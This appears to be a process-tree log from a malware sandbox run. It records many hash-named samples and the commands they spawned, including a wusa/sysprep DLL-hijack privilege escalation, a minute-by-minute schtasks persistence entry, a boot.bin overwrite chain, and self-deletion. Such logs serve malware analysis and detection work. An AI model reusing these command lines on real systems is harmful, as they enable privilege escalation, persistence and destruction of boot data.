- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\03641e5632673615f23b2a8325d7355c4499a40f47b6ae094606a73c56e24ad0.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\03641e5632673615f23b2a8325d7355c4499a40f47b6ae094606a73c56e24ad0.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:1832
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c type "C:\Windows\\waccess1832.tmp"
    3⤵
    PID:5352
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:4504
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0468127a19daf4c7bc41015c5640fe1f.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0468127a19daf4c7bc41015c5640fe1f.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:4512
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:2804
- - C:\Windows\system32\cmd.exe
    /c wusa.exe C:\Users\Admin\AppData\Local\Temp\CryptBase.dll.cab /quiet /extract:C:\Windows\system32\sysprep\
    3⤵
    PID:4348
  - - C:\Windows\system32\wusa.exe
      wusa.exe C:\Users\Admin\AppData\Local\Temp\CryptBase.dll.cab /quiet /extract:C:\Windows\system32\sysprep\
      4⤵
      PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\SysNative\cmd.exe /c C:\Windows\system32\sysprep\sysprep.exe C:\Users\Admin\AppData\Local\Temp\gupdate.exe
    3⤵
    PID:3672
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\07529fae9e74be81fd302d022603d9f0796b4b9120b0d6131f75d41b979bbca5.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\07529fae9e74be81fd302d022603d9f0796b4b9120b0d6131f75d41b979bbca5.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:3476
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c type "C:\Windows\\waccess3476.tmp"
    3⤵
    PID:4448
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\084a220ba90622cc223b93f32130e9f2d072679f66d1816775bf14832d492b8a.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\084a220ba90622cc223b93f32130e9f2d072679f66d1816775bf14832d492b8a.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:2184
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0cfc34fa76228b1afc7ce63e284a23ce1cd2927e6159b9dea9702ad9cb2a6300.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0cfc34fa76228b1afc7ce63e284a23ce1cd2927e6159b9dea9702ad9cb2a6300.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:4488
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\08fd696873ed9df967a991fb397fe11e54a4367c81c6660575e1413b440c3af2.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\08fd696873ed9df967a991fb397fe11e54a4367c81c6660575e1413b440c3af2.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\ldwc.bat
    3⤵
    PID:4988
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0d7d4dc173c88c4f72c8f9f419ae8473d044f4b3e8f32e4a0f34fe4bbc698776.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0d7d4dc173c88c4f72c8f9f419ae8473d044f4b3e8f32e4a0f34fe4bbc698776.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:2012
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0dc2ab0ccf783fb39028326a7e8b0ba4eaa148020ec05fc26313ef2bf70f700f.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0dc2ab0ccf783fb39028326a7e8b0ba4eaa148020ec05fc26313ef2bf70f700f.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:3404
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0eb038e7e5edd6ac1b4eee8dd1c51b6d94da24d02ba705e7e7f10b41edf701c2.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0eb038e7e5edd6ac1b4eee8dd1c51b6d94da24d02ba705e7e7f10b41edf701c2.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:4168
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:576
- - C:\Users\Admin\25963733\protect.exe
    "C:\Users\Admin\25963733\protect.exe"
    3⤵
    PID:4508
- - C:\Users\Admin\25963733\assembler.exe
    "C:\Users\Admin\25963733\assembler.exe" -f bin "C:\Users\Admin\25963733\boot.asm" -o "C:\Users\Admin\25963733\boot.bin"
    3⤵
    PID:5160
- - C:\Users\Admin\25963733\overwrite.exe
    "C:\Users\Admin\25963733\overwrite.exe" "C:\Users\Admin\25963733\boot.bin"
    3⤵
    PID:5956
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1002.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1002.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:3996
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\3193CB~1.EXE"
    3⤵
    PID:8396
  - - C:\Users\Admin\AppData\Roaming\3193CB~1.EXE
      C:\Users\Admin\AppData\Roaming\3193CB~1.EXE
      4⤵
      PID:2796
- - C:\Windows\SYSTEM32\taskkill.exe
    "taskkill" /F /IM 1002.exe.exe
    3⤵
    - Kills process with taskkill
    PID:2040
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1003.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1003.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:2332
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1215584b4fa69130799f6cf5efe467f380dc68b14ed2c76f63ca6b461ad57246.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1215584b4fa69130799f6cf5efe467f380dc68b14ed2c76f63ca6b461ad57246.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:3800
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\131.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\131.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:5032
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\15540D149889539308135FA12BEDBCBF.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\15540D149889539308135FA12BEDBCBF.exe.exe"
  2⤵
  PID:4960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.binarypop.com/?cid=114&eid=001&key=0112
    3⤵
    PID:5328
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb488546f8,0x7ffb48854708,0x7ffb48854718
      4⤵
      PID:5816
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
      4⤵
      PID:9096
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
      4⤵
      PID:9064
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:8
      4⤵
      PID:7612
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
      4⤵
      PID:1352
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
      4⤵
      PID:8416
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
      4⤵
      PID:1284
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
      4⤵
      PID:5784
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
      4⤵
      PID:1108
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
      4⤵
      PID:7264
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
      4⤵
      PID:5300
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
      4⤵
      PID:5944
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2032 /prefetch:1
      4⤵
      PID:7576
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
      4⤵
      PID:7596
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10085696882624243971,7710904996904335267,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
      4⤵
      PID:2200
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\17.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\17.exe.exe"
  2⤵
  PID:2760
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 320
    3⤵
    - Program crash
    PID:2664
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 320
    3⤵
    - Program crash
    PID:6620
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\19e818d0da361c4feedd456fca63d68d4b024fbbd3d9265f606076c7ee72e8f8.ViR.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\19e818d0da361c4feedd456fca63d68d4b024fbbd3d9265f606076c7ee72e8f8.ViR.exe"
  2⤵
  PID:4500
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1952fa94b582e9af9dca596b5e51c585a78b8b1610639e3b878bbfa365e8e908.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1952fa94b582e9af9dca596b5e51c585a78b8b1610639e3b878bbfa365e8e908.exe.exe"
  2⤵
  PID:3340
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c type "C:\Windows\\waccess3340.tmp"
    3⤵
    PID:3524
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1b76fdbd4cd92c7349bc99291137637614f4fb9598ae29df0a39a422611b86f8.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1b76fdbd4cd92c7349bc99291137637614f4fb9598ae29df0a39a422611b86f8.exe.exe"
  2⤵
  PID:352
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1b893ca3b782679b1e5d1afecb75be7bcc145b5da21a30f6c18dbddc9c6de4e7.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1b893ca3b782679b1e5d1afecb75be7bcc145b5da21a30f6c18dbddc9c6de4e7.exe.exe"
  2⤵
  PID:1948
- - C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1b893ca3b782679b1e5d1afecb75be7bcc145b5da21a30f6c18dbddc9c6de4e7.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1b893ca3b782679b1e5d1afecb75be7bcc145b5da21a30f6c18dbddc9c6de4e7.exe.exe"
    3⤵
    PID:4808
  - - C:\Users\Admin\AppData\Local\Temp\utilview.exe
      C:\Users\Admin\AppData\Local\Temp\utilview.exe
      4⤵
      PID:4904
    - - C:\Users\Admin\AppData\Local\Temp\utilview.exe
        
        C:\Users\Admin\AppData\Local\Temp\utilview.exe
        5⤵
        
        PID:5188
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\20240431d6eb6816453651b58b37f53950fcc3f0929813806525c5fd97cdc0e1.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\20240431d6eb6816453651b58b37f53950fcc3f0929813806525c5fd97cdc0e1.exe.exe"
  2⤵
  PID:4316
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1ee894c0b91f3b2f836288c22ebeab44798f222f17c255f557af2260b8c6a32d.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1ee894c0b91f3b2f836288c22ebeab44798f222f17c255f557af2260b8c6a32d.exe.exe"
  2⤵
  PID:4472
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\PROGRA~1\MICROS~3\torunzip.exe"
    3⤵
    PID:8624
  - - C:\PROGRA~1\MICROS~3\torunzip.exe
      C:\PROGRA~1\MICROS~3\torunzip.exe
      4⤵
      PID:9088
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1D34D800AA3320DC17A5786F8EEC16EE.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\1D34D800AA3320DC17A5786F8EEC16EE.exe.exe"
  2⤵
  PID:2744
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 396
    3⤵
    - Program crash
    PID:3832
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 396
    3⤵
    - Program crash
    PID:5168
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\2094d105ec70aa98866a83b38a22614cff906b2cf0a08970ed59887383ee7b70.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\2094d105ec70aa98866a83b38a22614cff906b2cf0a08970ed59887383ee7b70.exe.exe"
  2⤵
  PID:280
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\21.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\21.exe.exe"
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Program Files\Common Files\0E588056ce.dll" InstallSvr3
    3⤵
    PID:3668
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Program Files\Common Files\whh02053.ocx" InstallSvr1 C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\21.exe.exe
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\system32\whhfd028.ocx" InstallSvr0
    3⤵
    PID:3424
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\23eeb35780faf868a7b17b8e8da364d71bae0e46c1ababddddddecbdbd2c2c64.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\23eeb35780faf868a7b17b8e8da364d71bae0e46c1ababddddddecbdbd2c2c64.exe.exe"
  2⤵
  PID:4900
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\260ebbf392498d00d767a5c5ba695e1a124057c1c01fff2ae76db7853fe4255b.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\260ebbf392498d00d767a5c5ba695e1a124057c1c01fff2ae76db7853fe4255b.exe.exe"
  2⤵
  PID:1256
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\23f12c28515e7b9d8b2dd60ef660290ae32434bb50d56a8c8259df4881800971.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\23f12c28515e7b9d8b2dd60ef660290ae32434bb50d56a8c8259df4881800971.exe.exe"
  2⤵
  PID:3204
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 472
    3⤵
    - Program crash
    PID:4948
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 472
    3⤵
    - Program crash
    PID:5532
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\2a3b92f6180367306d750e59c9b6446b.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\2a3b92f6180367306d750e59c9b6446b.exe.exe"
  2⤵
  PID:2520
- - C:\ProgramData\3101f8f780\gbudn.exe
    "C:\ProgramData\3101f8f780\gbudn.exe"
    3⤵
    PID:7024
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gbudn.exe /TR "C:\ProgramData\3101f8f780\gbudn.exe" /F
      4⤵
      PID:1360
    - - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN gbudn.exe /TR C:\ProgramData\3101f8f780\gbudn.exe /F
        5⤵
        Creates scheduled task(s)
        
        PID:6052
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\30196c83a1f857d36fde160d55bd4e5b5d50fbb082bd846db295cbe0f9d35cfb.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\30196c83a1f857d36fde160d55bd4e5b5d50fbb082bd846db295cbe0f9d35cfb.exe.exe"
  2⤵
  PID:3088
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c type "C:\Windows\\waccess3088.tmp"
    3⤵
    PID:2112
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\301210D5557D9BA34F401D3EF7A7276F.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\301210D5557D9BA34F401D3EF7A7276F.exe.exe"
  2⤵
  PID:1200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytk.bat" "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\301210D5557D9BA34F401D3EF7A7276F.exe.exe" "
    3⤵
    PID:5668
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\323CANON.EXE_WORM_VOBFUS.SM01.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\323CANON.EXE_WORM_VOBFUS.SM01.exe"
  2⤵
  PID:3276
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\ruxiv.exe"
    3⤵
    PID:3256
  - - C:\Users\Admin\ruxiv.exe
      C:\Users\Admin\ruxiv.exe
      4⤵
      PID:5304
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe.exe"
  2⤵
  PID:1228
- - C:\Users\Admin\AppData\Roaming\fsaqqop.exe
    C:\Users\Admin\AppData\Roaming\fsaqqop.exe
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\TMPH9G~1\3372C1~1.EXE >> NUL
    3⤵
    PID:6976
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\388f5bc2f088769b361dfe8a45f0d5237c4580b287612422a03babe6994339ff.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\388f5bc2f088769b361dfe8a45f0d5237c4580b287612422a03babe6994339ff.exe.exe"
  2⤵
  PID:3480
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c type "C:\Windows\\waccess3480.tmp"
    3⤵
    PID:4752
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3b4497c7f8c89bf22c984854ac7603573a53b95ed147e80c0f19e549e2b65693.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3b4497c7f8c89bf22c984854ac7603573a53b95ed147e80c0f19e549e2b65693.exe.exe"
  2⤵
  PID:1460
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3bedb4bdb17718fda1edd1a8fa4289dc61fdda598474b5648414e4565e88ecd5.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3bedb4bdb17718fda1edd1a8fa4289dc61fdda598474b5648414e4565e88ecd5.exe.exe"
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c type "C:\Windows\\waccess1700.tmp"
    3⤵
    PID:224
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3f2781d44c71a2c0509173118dd97e5196db510a65c9f659dc2366fa315fe5e5.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3f2781d44c71a2c0509173118dd97e5196db510a65c9f659dc2366fa315fe5e5.exe.exe"
  2⤵
  PID:4312
- - C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3f2781d44c71a2c0509173118dd97e5196db510a65c9f659dc2366fa315fe5e5.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3f2781d44c71a2c0509173118dd97e5196db510a65c9f659dc2366fa315fe5e5.exe.exe"
    3⤵
    PID:1472
  - - C:\Users\Admin\AppData\Local\Temp\syhonay.exe
      C:\Users\Admin\AppData\Local\Temp\syhonay.exe
      4⤵
      PID:4252
    - - C:\Users\Admin\AppData\Local\Temp\syhonay.exe
        
        C:\Users\Admin\AppData\Local\Temp\syhonay.exe
        5⤵
        
        PID:668
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\40accff9b9d71053d4d6f95e6efd7eca1bb1ef5af77c319fe5a4b429eb373990.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\40accff9b9d71053d4d6f95e6efd7eca1bb1ef5af77c319fe5a4b429eb373990.exe.exe"
  2⤵
  PID:1544
- - C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\40accff9b9d71053d4d6f95e6efd7eca1bb1ef5af77c319fe5a4b429eb373990.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\40accff9b9d71053d4d6f95e6efd7eca1bb1ef5af77c319fe5a4b429eb373990.exe.exe"
    3⤵
    PID:2648
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3_4.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3_4.exe.exe"
  2⤵
  PID:3380
- - C:\Users\Admin\AppData\Roaming\jusched.exe
    alina=C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\3_4.exe.exe
    3⤵
    PID:2504
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\50414f60d7e24d25f9ebb68f99d67a46e8b12458474ac503b6e0d0562075a985.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\50414f60d7e24d25f9ebb68f99d67a46e8b12458474ac503b6e0d0562075a985.exe.exe"
  2⤵
  PID:4152
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c type "C:\Windows\\waccess4152.tmp"
    3⤵
    PID:5640
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\4bfe2216ee63657312af1b2507c8f2bf362fdf1d63c88faba397e880c2e39430.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\4bfe2216ee63657312af1b2507c8f2bf362fdf1d63c88faba397e880c2e39430.exe.exe"
  2⤵
  PID:2004
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\48b1024f599c3184a49c0d66c5600385265b9868d0936134185326e2db0ab441.exe.exe
